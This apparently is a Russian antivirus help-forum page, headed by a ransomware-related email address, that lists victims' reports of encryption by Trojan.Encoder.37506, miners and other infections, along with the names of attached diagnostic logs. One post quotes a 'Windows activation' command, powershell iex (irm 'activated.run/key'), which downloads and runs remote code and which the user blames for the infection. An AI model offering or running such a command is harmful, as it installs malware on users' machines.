Вирус Novikov.Vavila@gmail.com
-
Похожий контент
-
От DmitriyDy
ПК на Windows11, Windows 10, Windows 7
Примерная дата шифрования с 17.01.2025
На некоторых ПК на которых установлен Dr.Web, вирус удали практически все, даже сам Dr.Web.
На некоторых ПК на которых установлен Dr.Web, вирус зашифровал часть файлов.
На некоторых ПК на которых установлен Dr.Web, при загрузке Windows автоматом загружается пользователь HIguys
На некоторых ПК на которых установлен Dr.Web, Dr.Web сработал и остановил вирус (отчеты прилагаю)
Ответ поддержки Dr.Web:
В данном случае файл зашифрован Trojan.Encoder.37506.
Расшифровка нашими силами невозможна
Во вложеных файлах: 1. Zip архив в котором: Скрин письма о выкупе, скрин загрузки пользователя HIguys, отчеты Dr.Web, Зашиврованные файлы. 2. логи, собранные Farbar Recovery Scan
Зашифрованные файлы+скрины+отчеты Dr.Web.zip Addition.txt FRST.txt
-
От Temikst
Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
CollectionLog-2025.02.09-23.46.zip
-
От VanyeJ
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.
Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название:
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту:
Причина: Облачная защита
Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
CollectionLog-2025.02.08-15.48.zip
-
От TloBeJluTeJlb
Здравствуйте, перед обращением прошерстил темы похожих проблем, но не нашёл своей. John каким-то совершенно непостижимым образом почти не влиял на работоспособность системы, а заметил я его исключительно из-за пропажи доступа к файлам Касперского, который полностью перестал запускаться.
Побился об ближайшую стену, подумал, прошёлся KVRT, которым ничего не нашло, подумал ещё немного, включил AV_block_remover. Он нашёл, сделал своё дело, но доступ к папке антивируса я всё ещё не получил :D! FRST, от нечего делать, тоже был задействован, но немного опосля. Короче говоря, я, даже после удаления злополучного майнера из системы, не могу получить доступ к своим же файлам.
FRST.txt Fixlog.txt Addition.txt AV_block_remove_2025.01.20-07.45.log
-
От foxlape
Запустил прогу и комп тупить начал, есть подозрения на вирус. Логи после запуска проги Logfile.rar (Сохранял логи через Processor Monitor)
-
Рекомендуемые сообщения